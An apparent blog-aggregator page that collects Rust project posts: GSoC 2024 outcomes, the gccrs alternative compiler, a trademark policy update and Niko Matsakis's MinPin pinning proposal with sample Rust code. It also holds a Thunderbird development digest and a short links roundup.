Rust procedural (proc) macros are currently run as native code that gets compiled to a shared object which is loaded directly into the process of the Rust compiler. Because of this design, these macros can do whatever they want, for example arbitrarily access the filesystem or communicate through a network. This has not only obvious security implications, but it also affects performance, as this design makes it difficult to cache proc macro invocations. Over the years, there have been various discussions about making proc macros more hermetic, for example by compiling them to WebAssembly modules, which can be easily executed in a sandbox. This would also open the possibility of distributing precompiled versions of proc macros via crates.io, to speed up fresh builds of crates that depend on proc macros.

The goal of this project was to examine what would it take to implement WebAssembly module support for proc macros and create a prototype of this idea. We knew this would be a very ambitious project, especially since Apurva did not have prior experience with contributing to the Rust compiler, and because proc macro internals are very complex. Nevertheless, some progress was made. With the help of his mentor, David, Apurva was able to create a prototype that can load WebAssembly code into the compiler via a shared object. Some work was also done to make use of the existing TokenStream serialization and deserialization code in the compiler's proc_macro crate.

Even though this project did not fulfill its original goals and more work will be needed in the future to get a functional prototype of WebAssembly proc macros, we are thankful for Apurva's contributions. The WebAssembly loading prototype is a good start, and Apurva's exploration of proc macro internals should serve as a useful reference for anyone working on this feature in the future. Going forward, we will try to describe more incremental steps for our GSoC projects, as this project was perhaps too ambitious from the start.

Tokio async support in Miri

miri is an interpreter that can find possible instances of undefined behavior in Rust code. It is being used across the Rust ecosystem, but previously it was not possible to run it on any non-trivial programs (those that ever await on anything) that use tokio, due a to a fundamental missing feature: support for the epoll syscall on Linux (and similar APIs on other major platforms).

Tiffany implemented the basic epoll operations needed to cover the majority of the tokio test suite, by crafting pure libc code examples that exercised those epoll operations, and then implementing their emulation in miri itself. At times, this required refactoring core miri components like file descriptor handling, as they were originally not created with syscalls like epoll in mind.

Surprising to everyone (though probably not tokio-internals experts), once these core epoll operations were finished, operations like async file reading and writing started working in miri out of the box! Due to limitations of non-blocking file operations offered by operating systems, tokio is wrapping these file operations in dedicated threads, which was already supported by miri.

Once Tiffany has finished the project, including stretch goals like implementing async file operations, she proceeded to contact tokio maintainers and worked with them to run miri on most tokio tests in CI. And we have good news: so far no soundness problems have been discovered! Tiffany has become a regular contributor to miri, focusing on continuing to expand the set of supported file descriptor operations. We thank her for all her contributions!

Conclusion

We are grateful that we could have been a part of the Google Summer of Code 2024 program, and we would also like to extend our gratitude to all our contributors! We are looking forward to joining the GSoC program again next year.

The Rust Programming Language Bloggccrs: An alternative compiler for Rust

This is a guest post from the gccrs project, at the invitation of the Rust Project, to clarify the relationship with the Rust Project and the opportunities for collaboration.

gccrs is a work-in-progress alternative compiler for Rust being developed as part of the GCC project. GCC is a collection of compilers for various programming languages that all share a common compilation framework. You may have heard about gccgo, gfortran, or g++, which are all binaries within that project, the GNU Compiler Collection. The aim of gccrs is to add support for the Rust programming language to that collection, with the goal of having the exact same behavior as rustc.

First and foremost, gccrs was started as a project because it is fun. Compilers are incredibly rewarding pieces of software, and are great fun to put together. The project was started back in 2014, before Rust 1.0 was released, but was quickly put aside due to the shifting nature of the language back then. Around 2019, work on the compiler started again, led by Philip Herron and funded by Open Source Security and Embecosm. Since then, we have kept steadily progressing towards support for the Rust language as a whole, and our team has kept growing with around a dozen contributors working regularly on the project. We have participated in the Google Summer of Code program for the past four years, and multiple students have joined the effort.

The main goal of gccrs is to provide an alternative option for compiling Rust. GCC is an old project, as it was first released in 1987. Over the years, it has accumulated numerous contributions and support for multiple targets, including some not supported by LLVM, the main backend used by rustc. A practical example of that reach is the homebrew Dreamcast scene, where passionate engineers develop games for the Dreamcast console. Its processor architecture, SuperH, is supported by GCC but not by LLVM. This means that Rust is not able to be used on those platforms, except through efforts like gccrs or the rustc-codegen-gcc backend - whose main differences will be explained later.

GCC also benefits from the decades of software written in unsafe languages. As such, a high amount of safety features have been developed for the project as external plugins, or even within the project as static analyzers. These analyzers and plugins are executed on GCC's internal representations, meaning that they are language-agnostic, and can thus be used on all the programming languages supported by GCC. Likewise, many GCC plugins are used for increasing the safety of critical projects such as the Linux kernel, which has recently gained support for the Rust programming language. This makes gccrs a useful tool for analyzing unsafe Rust code, and more generally Rust code which has to interact with existing C code. We also want gccrs to be a useful tool for rustc itself by helping pan out the Rust specification effort with a unique viewpoint - that of a tool trying to replicate another's functionality, oftentimes through careful experimentation and source reading where the existing documentation did not go into enough detail. We are also in the process of developing various tools around gccrs and rustc, for the sole purpose of ensuring gccrs is as correct as rustc - which could help in discovering surprising behavior, unexpected functionality, or unspoken assumptions.

We would like to point out that our goal in aiding the Rust specification effort is not to turn it into a document for certifying alternative compilers as "Rust compilers" - while we believe that the specification will be useful to gccrs, our main goal is to contribute to it, by reviewing and adding to it as much as possible.

Furthermore, the project is still "young", and still requires a huge amount of work. There are a lot of places to make your mark, and a lot of easy things to work on for contributors interested in compilers. We have strived to create a safe, fun, and interesting space for all of our team and our GSoC students. We encourage anyone interested to come chat with us on our various communication platforms, and offer mentorship for you to learn how to contribute to the project and to compilers in general.

Maybe more importantly however, there is a number of things that gccrs is NOT for. The project has multiple explicit non-goals, which we value just as highly as our goals.

The most crucial of these non-goals is for gccrs not to become a gateway for an alternative or extended Rust-like programming language. We do not wish to create a GNU-specific version of Rust, with different semantics or slightly different functionality. gccrs is not a way to introduce new Rust features, and will not be used to circumvent the RFC process - which we will be using, should we want to see something introduced to Rust. Rust is not C, and we do not intend to introduce subtle differences in standard by making some features available only to gccrs users. We know about the pain caused by compiler-specific standards, and have learned from the history of older programming languages.

We do not want gccrs to be a competitor to the rustc_codegen_gcc backend. While both projects will effectively achieve the same goal, which is to compile Rust code using the GCC compiler framework, there are subtle differences in what each of these projects will unlock for the language. For example, rustc_codegen_gcc makes it easy to benefit from all of rustc's amazing diagnostics and helpful error messages, and makes Rust easily usable on GCC-specific platforms. On the other hand, it requires rustc to be available in the first place, whereas gccrs is part of a separate project entirely. This is important for some users and core Linux developers for example, who believe that having the ability to compile the entire kernel (C and Rust parts) using a single compiler is essential. gccrs can also offer more plugin entrypoints by virtue of it being its own separate GCC frontend. It also allows Rust to be used on GCC-specific platforms with an older GCC where libgccjit is not available. Nonetheless, we are very good friends with the folks working on rustc_codegen_gcc, and have helped each other multiple times, especially in dealing with the patch-based contribution process that GCC uses.

All of this ties into a much more global goal, which we could summarize as the following: We do not want to split the Rust ecosystem. We want gccrs to help the language reach even more people, and even more platforms.

To ensure that, we have taken multiple measures to make sure the values of the Rust project are respected and exposed properly. One of the features we feel most strongly about is the addition of a very annoying command line flag to the compiler, -frust-incomplete-and-experimental-compiler-do-not-use. Without it, you are not able to compile any code with gccrs, and the compiler will output the following error message:

crab1: fatal error: gccrs is not yet able to compile Rust code properly. Most of the errors produced will be the fault of gccrs and not the crate you are trying to compile. Because of this, please report errors directly to us instead of opening issues on said crate's repository.

Our github repository: https://github.com/rust-gcc/gccrs

Our bugzilla tracker: https://gcc.gnu.org/bugzilla/buglist.cgi?bug_status=__open__&component=rust&product=gcc

If you understand this, and understand that the binaries produced might not behave accordingly, you may attempt to use gccrs in an experimental manner by passing the following flag:

-frust-incomplete-and-experimental-compiler-do-not-use

or by defining the following environment variable (any value will do)

GCCRS_INCOMPLETE_AND_EXPERIMENTAL_COMPILER_DO_NOT_USE

For cargo-gccrs, this means passing

GCCRS_EXTRA_ARGS="-frust-incomplete-and-experimental-compiler-do-not-use"

as an environment variable.

Until the compiler can compile correct Rust and, most importantly, reject incorrect Rust, we will be keeping this command line option in the compiler. The hope is that it will prevent users from potentially annoying existing Rust crate maintainers with issues about code not compiling, when it is most likely our fault for not having implemented part of the language yet. Our goal of creating an alternative compiler for the Rust language must not have a negative effect on any member of the Rust community. Of course, this command line flag is not to the taste of everyone, and there has been significant pushback to its presence... but we believe it to be a good representation of our main values.

In a similar vein, gccrs separates itself from the rest of the GCC project by not using a mailing list as its main mode of communication. The compiler we are building will be used by the Rust community, and we believe we should make it easy for that community to get in touch with us and report the problems they encounter. Since Rustaceans are used to GitHub, this is also the development platform we have been using for the past five years. Similarly, we use a Zulip instance as our main communication platform, and encourage anyone wanting to chat with us to join it. Note that we still have a mailing list, as well as an IRC channel (gcc-rust@gcc.gnu.org and #gccrust on oftc.net), where all are welcome.

To further ensure that gccrs does not create friction in the ecosystem, we want to be extremely careful about the finer details of the compiler, which to us means reusing rustc components where possible, sharing effort on those components, and communicating extensively with Rust experts in the community. Two Rust components are already in use by gccrs: a slightly older version of polonius, the next-generation Rust borrow-checker, and the rustc_parse_format crate of the compiler. There are multiple reasons for reusing these crates, with the main one being correctness. Borrow checking is a complex topic and a pillar of the Rust programming language. Having subtle differences between rustc and gccrs regarding the borrow rules would be annoying and unproductive to users - but by making an effort to start integrating polonius into our compilation pipeline, we help ensure that the results we produce will be equivalent to rustc. You can read more about the various components we use, and we plan to reuse even more here. We would also like to contribute to the polonius project itself and help make it better if possible. This cross-pollination of components will obviously benefit us, but we believe it will also be useful for the Rust project and ecosystem as a whole, and will help strengthen these implementations.

Reusing rustc components could also be extended to other areas of the compiler: Various components of the type system, such as the trait solver, an essential and complex piece of software, could be integrated into gccrs. Simpler things such as parsing, as we have done for the format string parser and inline assembly parser, also make sense to us. They will help ensure that the internal representation we deal with will correspond to the one expected by the Rust standard library.

On a final note, we believe that one of the most important steps we could take to prevent breakage within the Rust ecosystem is to further improve our relationship with the Rust community. The amount of help we have received from Rust folks is great, and we think gccrs can be an interesting project for a wide range of users. We would love to hear about your hopes for the project and your ideas for reducing ecosystem breakage or lowering friction with the crates you have published. We had a great time chatting about gccrs at RustConf 2024, and everyone's interest in the project was heartwarming. Please get in touch with us if you have any ideas on how we could further contribute to Rust.

The Rust Programming Language BlogNext Steps on the Rust Trademark Policy

As many of you know, the Rust language trademark policy has been the subject of an extended revision process dating back to 2022. In 2023, the Rust Foundation released an updated draft of the policy for input following an initial survey about community trademark priorities from the previous year along with review by other key stakeholders, such as the Project Directors. Many members of our community were concerned about this initial draft and shared their thoughts through the feedback form. Since then, the Rust Foundation has continued to engage with the Project Directors, the Leadership Council, and the wider Rust project (primarily via all@) for guidance on how to best incorporate as much feedback as possible.

After extensive discussion, we are happy to circulate an updated draft with the wider community today for final feedback. An effective trademark policy for an open source community should reflect our collective priorities while remaining legally sound. While the revised trademark policy cannot perfectly address every individual perspective on this important topic, its goal is to establish a framework to help guide appropriate use of the Rust trademark and reflect as many common values and interests as possible. In short, this policy is designed to steer our community toward a shared objective: to maintain and protect the integrity of the Rust programming language.

The Leadership Council is confident that this updated version of the policy has addressed the prevailing concerns about the initial draft and honors the variety of voices that have contributed to its development. Thank you to those who took the time to submit well-considered feedback for the initial draft last year or who otherwise participated in this long-running process to update our policy to continue to satisfy our goals.

Please review the updated Rust trademark policy here, and share any critical concerns you might have via this form by November 20, 2024. The Foundation has also published a blog post which goes into more detail on the changes made so far. The Leadership Council and Project Directors look forward to reviewing concerns raised and approving any final revisions prior to an official update of the policy later this year.

Niko MatsakisMinPin: yet another pin proposal

This post floats a variation of boats’ UnpinCell proposal that I’m calling MinPin.1 MinPin’s goal is to integrate Pin into the language in a “minimally disruptive” way2 – and in particular a way that is fully backwards compatible. Unlike Overwrite, MinPin does not attempt to make Pin and &mut “play nicely” together. It does however leave the door open to add Overwrite in the future, and I think helps to clarify the positives and negatives that Overwrite would bring.

TL;DR: Key design decisions

Here is a brief summary of MinPin’s rules

  • The pinned keyword can be used to get pinned variations of things:
    • In types, pinned P is equivalent to Pin<P>, so pinned &mut T and pinned Box<T> are equivalent to Pin<&mut T> and Pin<Box<T>> respectively.
    • In function signatures, pinned &mut self can be used instead of self: Pin<&mut Self>.
    • In expressions, pinned &mut $place is used to get a pinned &mut that refers to the value in $place.
  • The Drop trait is modified to have fn drop(pinned &mut self) instead of fn drop(&mut self).
    • However, impls of Drop are still permitted (even encouraged!) to use fn drop(&mut self), but it means that your type will not be able to use (safe) pin-projection. For many types that is not an issue; for futures or other “address sensitive” types, you should use fn drop(pinned &mut self).
  • The rules for field projection from a s: pinned &mut S reference are based on whether or not Unpin is implemented:
    • Projection is always allowed for fields whose type implements Unpin.
    • For fields whose types are not known to implement Unpin:
      • If the struct S is Unpin, &mut projection is allowed but not pinned &mut.
      • If the struct S is !Unpin[^neg] and does not have a fn drop(&mut self) method, pinned &mut projection is allowed but not &mut.
      • If the type checker does not know whether S is Unpin or not, or if the type S has a Drop impl with fn drop(&mut self), neither form of projection is allowed for fields that are not Unpin.
  • There is a type struct Unpinnable<T> { value: T } that always implements Unpin.

Design axioms

Before I go further I want to layout some of my design axioms (beliefs that motivate and justify my design).

  • Pin is part of the Rust language. Despite Pin being entirely a “library-based” abstraction at present, it is very much a part of the language semantics, and it deserves first-class support. It should be possible to create pinned references and do pin projections in safe Rust.
  • Pin is its own world. Pin is only relevant in specific use cases, like futures or in-place linked lists.
  • Pin should have zero-conceptual-cost. Unless you are writing a Pin-using abstraction, you shouldn’t have to know or think about pin at all.
  • Explicit is possible. Automatic operations are nice but it should always be possible to write operations explicitly when needed.
  • Backwards compatible. Existing code should continue to compile and work.

Frequently asked questions

For the rest of the post I’m just going to go into FAQ mode.

I see the rules, but can you summarize how MinPin would feel to use?

Yes. I think the rule of thumb would be this. For any given type, you should decide whether your type cares about pinning or not.

Most types do not care about pinning. They just go on using &self and &mut self as normal. Everything works as today (this is the “zero-conceptual-cost” goal).

But some types do care about pinning. These are typically future implementations but they could be other special case things. In that case, you should explicitly implement !Unpin to declare yourself as pinnable. When you declare your methods, you have to make a choice

  • Is the method read-only? Then use &self, that always works.
  • Otherwise, use &mut self or pinned &mut self, depending…
    • If the method is meant to be called before pinning, use &mut self.
    • If the method is meant to be called after pinning, use pinned &mut self.

This design works well so long as all mutating methods can be categorized into before-or-after pinning. If you have methods that need to be used in both settings, you have to start using workarounds – in the limit, you make two copies.

How does MinPin compare to UnpinCell?

Those of you who have been following the various posts in this area will recognize many elements from boats’ recent UnpinCell. While the proposals share many elements, there is also one big difference between them that makes a big difference in how they would feel when used. Which is overall better is not yet clear to me.

Let’s start with what they have in common. Both propose syntax for pinned references/borrows (albeit slightly different syntax) and both include a type for “opting out” from pinning (the eponymous UnpinCell<T> in UnpinCell, Unpinnable<T> in MinPin). Both also have a similar “special case” around Drop in which writing a drop impl with fn drop(&mut self) disables safe pin-projection.

Where they differ is how they manage generic structs like WrapFuture<F>, where it is not known whether or not they are Unpin.

struct WrapFuture<F: Future> {
    future: F,
}

The r: pinned &mut WrapFuture<F>, the question is whether we can project the field future:

impl<F: Future> WrapFuture<F> {
    fn method(pinned &mut self) {
        let f = pinned &mut r.future;
        //      --------------------
        //      Is this allowed?
    }
}

There is a specific danger case that both sets of rules are trying to avoid. Imagine that WrapFuture<F> implements Unpin but F does not – e.g., imagine that you have a impl<F: Future> Unpin for WrapFuture<F>. In that case, the referent of the pinned &mut WrapFuture<F> reference is not actually pinned, because the type is unpinnable. If we permitted the creation of a pinned &mut F, where F: !Unpin, we would be under the (mistaken) impression that F is pinned. Bad.

UnpinCell handles this case by saying that projecting from a pinned &mut is only allowed so long as there is no explicit impl of Unpin for WrapFuture (“if [WrapFuture<F>] implements Unpin, it does so using the auto-trait mechanism, not a manually written impl”). Basically: if the user doesn’t say whether the type is Unpin or not, then you can do pin-projection. The idea is that if the self type is Unpin, that will only be because all fields are unpin (in which case it is fine to make pinned &mut references to them); if the self type is not Unpin, then the field future is pinned, so it is safe.

In contrast, in MinPin, this case is only allowed if there is an explicit !Unpin impl for WrapFuture:

impl<F: Future> !Unpin for WrapFuture<F> {
    // This impl is required in MinPin, but not in UnpinCell
}

Explicit negative impls are not allowed on stable, but they were included in the original auto trait RFC. The idea is that a negative impl is an explicit, semver-binding commitment not to implement a trait. This is different from simply not including an impl at all, which allows for impls to be added later.

Why would you prefer MinPin over UnpinCell or vice versa?

I’m not totally sure which of these is better. I came to the !Unpin impl based on my axiom that pin is its own world – the idea was that it was better to push types to be explicitly unpin all the time than to have “dual-mode” types that masquerade as sometimes pinned and sometimes not.

In general I feel like it’s better to justify language rules by the presence of a declaration than the absence of one. So I don’t like the idea of saying “the absence of an Unpin impl allows for pin-projection” – after all, adding impls is supposed to be semver-compliant. Of course, that’s much lesss true for auto traits, but it can still be true.

In fact, Pin has had some unsoundness in the past based on unsafe reasoning that was justified by the lack of an impl. We assumed that &T could never implemented DerefMut, but it turned out to be possible to add weird impls of DerefMut in very specific cases. We fixed this by adding an explicit impl<T> !DerefMut for &T impl.

On the other hand, I can imagine that many explicitly implemented futures might benefit from being able to be ambiguous about whether they are Unpin.

What does your design axiom “Pin is its own world” mean?

The way I see it is that, in Rust today (and in MinPin, pinned places, UnpinCell, etc), if you have a T: !Unpin type (that is, a type that is pinnable), it lives a double life. Initially, it is unpinned, and you interact can move it, &-ref it, or &mut-ref it, just like any other Rust value. But once a !Unpin value becomes pinned to a place, it enters a different state, in which you can no longer move it or use &mut, you have to use pinned &mut:

flowchart TD
Unpinned[
    Unpinned: can access 'v' with '&' and '&mut'
]

Pinned[
    Pinned: can access 'v' with '&' and 'pinned &mut'
]

Unpinned --
    pin 'v' in place (only if T is '!Unpin')
--> Pinned
  

One-way transitions like this limit the amount of interop and composability you get in the language. For example, if my type has &mut methods, I can’t use them once the type is pinned, and I have to use some workaround, such as duplicating the method with pinned &mut.3 In this specific case, however, I don’t think this transition is so painful, and that’s because of the specifics of the domain: futures go through a pretty hard state change where they start in “preparation mode” and then eventually start executing. The set of methods you need at these two phases are quite distinct. So this is what I meant by “pin is its own world”: pin is not very interopable with Rust, but this is not as bad as it sounds, because you don’t often need that kind of interoperability.

How would Overwrite affect pin being in its own world?

With Overwrite, when you pin a value in place, you just gain the ability to use pinned &mut, you don’t give up the ability to use &mut:

flowchart TD
Unpinned[
    Unpinned: can access 'v' with '&' and '&mut'
]

Pinned[
    Pinned: can additionally access 'v' with 'pinned &mut'
]

Unpinned --
    pin 'v' in place (only if T is '!Unpin')
--> Pinned
  

Making pinning into a “superset” of the capabilities of pinned means that pinned &mut can be coerced into an &mut (it could even be a “true subtype”, in Rust terms). This in turn means that a pinned &mut Self method can invoke &mut self methods, which helps to make pin feel like a smoothly integrated part of the language.3

So does the axiom mean you think Overwrite is a bad idea?

Not exactly, but I do think that if Overwrite is justified, it is not on the basis of Pin, it is on the basis of immutable fields. If you just look at Pin, then Overwrite does make Pin work better, but it does that by limiting the capabilities of &mut to those that are compatible with Pin. There is no free lunch! As Eric Holk memorably put it to me in privmsg:

It seems like there’s a fixed amount of inherent complexity to pinning, but it’s up to us how we distribute it. Pin keeps it concentrated in a small area which makes it seem absolutely terrible, because you have to face the whole horror at once.4

I think Pin as designed is a “zero-conceptual-cost” abstraction, meaning that if you are not trying to use it, you don’t really have to care about it. That’s worth maintaining, if we can. If we are going to limit what &mut can do, the reason to do it is primarily to get other benefits, not to benefit pin code specifically.

To be clear, this is largely a function of where we are in Rust’s evolution. If we were still in the early days of Rust, I would say Overwrite is the correct call. It reminds me very much of the IMHTWAMA, the core “mutability xor sharing” rule at the heart of Rust’s borrow checker. When we decided to adopt the current borrow checker rules, the code was about 85-95% in conformance. That is, although there was plenty of aliased mutation, it was clear that “mutability xor sharing” was capturing a rule that we already mostly followed, but not completely. Because combining aliased state with memory safety is more complicated, that meant that a small minority of code was pushing complexity onto the entire language. Confining shared mutation to types like Cell and Mutex made most code simpler at the cost of more complexity around shared state in particular.

There’s a similar dynamic around replace and swap. Replace and swap are only used in a few isolated places and in a few particular ways, but the all code has to be more conservative to account for that possibility. If we could go back, I think limiting Replace to some kind of Replaceable<T> type would be a good move, because it would mean that the more common case can enjoy the benefits: fewer borrow check errors and more precise programs due to immutable fields and the ability to pass an &mut SomeType and be sure that your callee is not swapping the value under your feet (useful for the “scope pattern” and also enables Pin<&mut> to be a subtype of &mut).

Why did you adopt pinned &mut and not &pin mut as the syntax?

The main reason was that I wanted a syntax that scaled to Pin<Box<T>>. But also the pin! macro exists, making the pin keyword somewhat awkward (though not impossible).

One thing I was wondering about is the phrase “pinned reference” or “pinned pointer”. On the one hand, it is really a reference to a pinned value (which suggests &pin mut). On the other hand, I think this kind of ambiguity is pretty common. The main thing I have found is that my brain has trouble with Pin<P> because it wants to think of Pin as a “smart pointer” versus a modifier on another smart pointer. pinned Box<T> feels much better this way.

Can you show me an example? What about the MaybeDone example?

Yeah, totally. So boats [pinned places][] post introduced two futures, MaybeDone and Join. Here is how MaybeDone would look in MinPin, along with some inline comments:

enum MaybeDone<F: Future> {
    Polling(F),
    Done(Unpinnable<Option<F::Output>>),
    //   ---------- see below
}

impl<F: Future> !Unpin for MaybeDone<F> { }
//              -----------------------
//
// `MaybeDone` is address-sensitive, so we
// opt out from `Unpin` explicitly. I assumed
// opting out from `Unpin` was the *default* in
// my other posts.

impl<F: Future> MaybeDone<F> {
    fn maybe_poll(pinned &mut self, cx: &mut Context<'_>) {
        if let MaybeDone::Polling(fut) = self {
            //                    ---
            // This is in fact pin-projection, although
            // it's happening implicitly as part of pattern
            // matching. `fut` here has type `pinned &mut F`.
            // We are permitted to do this pin-projection
            // to `F` because we know that `Self: !Unpin`
            // (because we declared that to be true).
            
            if let Poll::Ready(res) = fut.poll(cx) {
                *self = MaybeDone::Done(Some(res));
            }
        }
    }

    fn is_done(&self) -> bool {
        matches!(self, &MaybeDone::Done(_))
    }

    fn take_output(pinned &mut self) -> Option<F::Output> {
        //         ----------------
        //     This method is called after pinning, so it
        //     needs a `pinned &mut` reference...  

        if let MaybeDone::Done(res) = self {
            res.value.take()
            //  ------------
            //
            //  ...but take is an `&mut self` method
            //  and `F:Output: Unpin` is known to be true.
            //  
            //  Therefore we have made the type in `Done`
            //  be `Unpinnable`, so that we can do this
            //  swap.
        } else {
            None
        }
    }
}

Can you translate the Join example?

Yep! Here is Join:

struct Join<F1: Future, F2: Future> {
    fut1: MaybeDone<F1>,
    fut2: MaybeDone<F2>,
}

impl<F1: Future, F2: Future> !Unpin for Join<F> { }
//                           ------------------
//
// Join is a custom future, so implement `!Unpin`
// to gain access to pin-projection.

impl<F1: Future, F2: Future> Future for Join<F1, F2> {
    type Output = (F1::Output, F2::Output);

    fn poll(pinned &mut self, cx: &mut Context<'_>) -> Poll<Self::Output> {
        // The calls to `maybe_poll` and `take_output` below
        // are doing pin-projection from `pinned &mut self`
        // to a `pinned &mut MaybeDone<F1>` (or `F2`) type.
        // This is allowed because we opted out from `Unpin`
        // above.

        self.fut1.maybe_poll(cx);
        self.fut2.maybe_poll(cx);
        
        if self.fut1.is_done() && self.fut2.is_done() {
            let res1 = self.fut1.take_output().unwrap();
            let res2 = self.fut2.take_output().unwrap();
            Poll::Ready((res1, res2))
        } else {
            Poll::Pending
        }
    }
}

What’s the story with Drop and why does it matter?

Drop’s current signature takes &mut self. But recall that once a !Unpin type is pinned, it is only safe to use pinned &mut. This is a combustible combination. It means that, for example, I can write a Drop that uses mem::replace or swap to move values out from my fields, even though they have been pinned.

For types that are always Unpin, this is no problem, because &mut self and pinned &mut self are equivalent. For types that are always !Unpin, I’m not too worried, because Drop as is is a poor fit for them, and pinned &mut self will be beter.

The tricky bit is types that are conditionally Unpin. Consider something like this:

struct LogWrapper<T> {
    value: T,
}

impl<T> Drop for LogWrapper<T> {
    fn drop(&mut self) {
        ...
    }
}

At least today, whether or not LogWrapper is Unpin depends on whether T: Unpin, so we can’t know it for sure.

The solution that boats and I both landed on effectively creates three categories of types:5

  • those that implement Unpin, which are unpinnable;
  • those that do not implement Unpin but which have fn drop(&mut self), which are unsafely pinnable;
  • those that do not implement Unpin and do not have fn drop(&mut self), which are safely pinnable.

The idea is that using fn drop(&mut self) puts you in this purgatory category of being “unsafely pinnable” (it might be more accurate to say being “maybe unsafely pinnable”, since often at compilation time with generics we won’t know if there is an Unpin impl or not). You don’t get access to safe pin projection or other goodies, but you can do projection with unsafe code (e.g., the way the pin-project-lite crate does it today).

It feels weird to have Drop let you use &mut self when other traits don’t.

Yes, it does, but in fact any method whose trait uses pinned &mut self can be implemented safely with &mut self so long as Self: Unpin. So we could just allow that in general. This would be cool because many hand-written futures are in fact Unpin, and so they could implement the poll method with &mut self.

Wait, so if Unpin types can use &mut self, why do we need special rules for Drop?

Well, it’s true that an Unpin type can use &mut self in place of pinned &mut self, but in fact we don’t always know when types are Unpin. Moreover, per the zero-conceptual-cost axiom, we don’t want people to have to know anything about Pin to use Drop. The obvious approaches I could think of all either violated that axiom or just… well… seemed weird:

  • Permit fn drop(&mut self) but only if Self: Unpin seems like it would work, since most types are Unpin. But in fact types, by default, are only Unpin if their fields are Unpin, and so generic types are not known to be Unpin. This means that if you write a Drop impl for a generic type and you use fn drop(&mut self), you will get an error that can only be fixed by implementing Unpin unconditionally. Because “pin is its own world”, I believe adding the impl is fine, but it violates “zero-conceptual-cost” because it means that you are forced to understand what Unpin even means in the first place.
  • To address that, I considered treating fn drop(&mut self) as implicitly declaring Self: Unpin. This doesn’t violate our axioms but just seems weird and kind of surprising. It’s also backwards incompatible with pin-project-lite.

These considerations let me to conclude that actually the current design kind of puts in a place where we want three categories. I think in retrospect it’d be better if Unpin were implemented by default but not as an auto trait (i.e., all types were unconditionally Unpin unless they declare otherwise), but oh well.

What is the forwards compatibility story for Overwrite?

I mentioned early on that MinPin could be seen as a first step that can later be extended with Overwrite if we choose. How would that work?

Basically, if we did the s/Unpin/Overwrite/ change, then we would

  • rename Unpin to Overwrite (literally rename, they would be the same trait);
  • prevent overwriting the referent of an &mut T unless T: Overwrite (or replacing, swapping, etc).

These changes mean that &mut T is pin-preserving. If T: !Overwrite, then T may be pinned, but then &mut T won’t allow it to be overwritten, replaced, or swapped, and so pinning guarantees are preserved (and then some, since technically overwrites are ok, just not replacing or swapping). As a result, we can simplify the MinPin rules for pin-projection to the following:

Given a reference s: pinned &mut S, the rules for projection of the field f are as follows:

  • &mut projection is allowed via &mut s.f.
  • pinned &mut projection is allowed via pinned &mut s.f if S: !Unpin

What would it feel like if we adopted Overwrite?

We actually got a bit of a preview when we talked about MaybeDone. Remember how we had to introduce Unpinnable around the final value so that we could swap it out? If we adopted Overwrite, I think the TL;DR of how code would be different is that most any code that today uses std::mem::replace or std::mem::swap would probably wind up using an explicit Unpinnable-like wrapper. I’ll cover this later.

This goes a bit to show what I meant about there being a certain amount of inherent complexity that we can choose to distibute: in MinPin, this pattern of wrapping “swappable” data is isolated to pinned &mut self methods in !Unpin types. With Overwrite, it would be more widespread (but you would get more widespread benefits, as well).

Conclusion

My conclusion is that this is a fascinating space to think about!6 So fun.


  1. Hat tip to Tyler Mandry and Eric Holk who discussed these ideas with me in detail. ↩︎

  2. MinPin is the “minimal” proposal that I feel meets my desiderata; I think you could devise a maximally minimal proposal is even smaller if you truly wanted. ↩︎

  3. It’s worth noting that coercions and subtyping though only go so far. For example, &mut can be coerced to &, but we often need methods that return “the same kind of reference they took in”, which can’t be managed with coercions. That’s why you see things like last and last_mut↩︎ ↩︎

  4. I would say that the current complexity of pinning is, in no small part, due to accidental complexity, as demonstrated by the recent round of exploration, but Eric’s wider point stands. ↩︎

  5. Here I am talking about the category of a particular monomorphized type in a particular version of the crate. At that point, every type either implements Unpin or it doesn’t. Note that at compilation time there is more grey area, as they can be types that may or may not be pinnable, etc. ↩︎

  6. Also that I spent way too much time iterating on this post. JUST GONNA POST IT. ↩︎

Mozilla ThunderbirdThunderbird Monthly Development Digest: October 2024

Hello again Thunderbird Community! The last few months have involved a lot of learning for me, but I have a much better appreciation (and appetite!) for the variety of challenges and opportunities ahead for our team and the broader developer community. Catch up with last month’s update, and here’s a quick summary of what’s been happening across the different teams:

Exchange Web Services support in Rust

An important member of our team left recently and while we’ll very much miss the spirit and leadership, we all learned a lot and are in a good position to carry the project forwards. We’ve managed to unstick a few pieces of the backlog and have a few sprints left to complete work on move/copy operations, protocol logging and priority two operations (flagging messages, folder rename & delete, etc). New team members have moved past the most painful stages and have patches that have landed. Kudos to the patient mentors involved in this process!

QR Code Cross-Device Account Import

Thunderbird for Android launched this week, and the desktop client (Daily, Beta & ESR 128.4.0) now provides a simple and secure account transfer mechanism, so that account settings don’t have to be re-entered for new users of the mobile app. Download Thunderbird for Android from the Play store

Account Hub

Development of a refreshed account hub is moving forward apace and with the critical path broken down into sprints, our entire front end team is working to complete things in the next two weeks. Meta bug & progress tracking.

Clean up on aisle 2

In addition to our project work, we’ve had to be fairly nimble this month, with a number of upstream changes breaking our builds and pipelines. We get a ton of benefit from the platforms we inherit but at times it feels like we’re dealing with many things out of our control. Mental note: stay calm and focus on future improvements!

Global Database, Conversation View & folder corruption issues

On top of the conversation view feature and core refactoring to tackle the inner workings of thread-safe folder and message manipulation, work to implement a long term database replacement is well underway. Preliminary patches are regularly pumped into the development ecosystem for discussion and review, for which we’re very excited!

In-App Notifications

With phase 1 of this project now complete, we’ve scoped out additions that will make it even more flexible and suitable for a variety of purposes. Beta users will likely see the first notifications coming in November, so keep your eyes peeled. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features are expected to debut this month (or very soon) and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month.

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest: October 2024 appeared first on The Thunderbird Blog.

Don Martilinks for 3 November 2024

Remote Startups Will Win the War for Top Talent Ironically, in another strike against the spontaneous collaboration argument, a study of two Fortune 500 headquarters found that transitioning from cubicles to an open office layout actually reduced face-to-face interactions by 70 percent.

Why Strava Is a Privacy Risk for the President (and You Too) Not everybody uses their real names or photos on Strava, but many do. And if a Strava account is always in the same place as the President, you can start to connect a few dots.

Why Getting Your Neighborhood Declared a Historic District Is a Bad Idea Historic designations are commonly used to control what people can do with their own private property, and can be a way of creating a kind of “backdoor” homeowners association. Some historic neighborhoods (many of which have dubious claims to the designation) around the country have HOA-like restrictions on renovations, repairs, and even landscaping.

